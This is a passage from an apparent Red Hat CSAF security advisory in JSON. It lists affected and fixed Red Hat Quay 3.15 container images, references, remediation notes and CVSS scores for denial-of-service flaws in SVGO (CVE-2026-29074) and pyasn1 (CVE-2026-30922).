"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-29074"
},
{
"category": "external",
"summary": "RHBZ#2445132",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445132"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-29074",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29074"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074"
},
{
"category": "external",
"summary": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673",
"url": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673"
}
],
"release_date": "2026-03-06T07:23:05.716000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "svgo: SVGO: Denial of Service via XML entity expansion"
},
{
"cve": "CVE-2026-30922",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-03-18T04:02:45.401296+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448553"
}
],
"notes": [
{
"category": "description",
"text": "An unbounded recursion flaw has been discovered in the pypi pyasn1 library. This uncontrolled recursion occurs when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested SEQUENCE (0x30) or SET (0x31) tags with Indefinite Length (0x80) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a RecursionError or consumes all available memory (OOM), crashing the host application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pyasn1: pyasn1 Vulnerable to Denial of Service via Unbounded Recursion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "RHBZ#2448553",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448553"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-30922",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-30922"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-30922",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30922"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0",
"url": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r",
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r"
}
],
"release_date": "2026-03-18T02:29:45.857000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
